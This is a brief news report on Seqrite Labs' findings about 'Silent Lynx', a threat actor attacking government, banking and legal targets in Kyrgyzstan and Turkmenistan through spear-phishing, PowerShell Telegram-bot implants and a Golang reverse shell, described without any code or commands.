A threat actor, dubbed ‘Silent Lynx’, has been linked to a series of sophisticated cyberattacks targeting key entities in Kyrgyzstan and Turkmenistan, including embassies, government-backed banks, lawyers, and think tanks.
According to a technical report from Seqrite Labs, the group is believed to originate from Kazakhstan, with a medium level of confidence, and has been linked to previous attacks against Eastern European and Central Asian governmental institutions.
The group’s attacks begin with spear-phishing campaigns targeting high-profile individuals in organizations. The malicious emails contain a RAR archive attachment, which delivers the final malicious payloads that grant the attackers remote access to the compromised systems. The payloads are designed to infiltrate sensitive networks and facilitate espionage.
Two major campaigns were detected by Seqrite Labs, the first of which took place on December 27, 2024. In this campaign, the attackers used a RAR archive containing an ISO file, which, once executed, triggered a malicious C++ binary and a decoy PDF file. The binary then deployed a PowerShell script that leveraged Telegram bots to execute commands and exfiltrate data. Some of the bot commands observed included curl commands used to download additional payloads from remote servers, including Google Drive.
The second campaign, while similar, featured a different payload composition. The RAR archive contained a decoy PDF and a Golang executable, which was designed to establish a reverse shell connection to an attacker-controlled server, giving the group further control over the infected systems.
Seqrite Labs also observed several tactical overlaps between Silent Lynx and YoroTrooper, a known cyber threat actor also associated with attacks targeting CIS (Commonwealth of Independent States) countries. YoroTrooper has previously used PowerShell and Golang tools in its campaigns, further suggesting potential connections or shared tactics between the two groups.
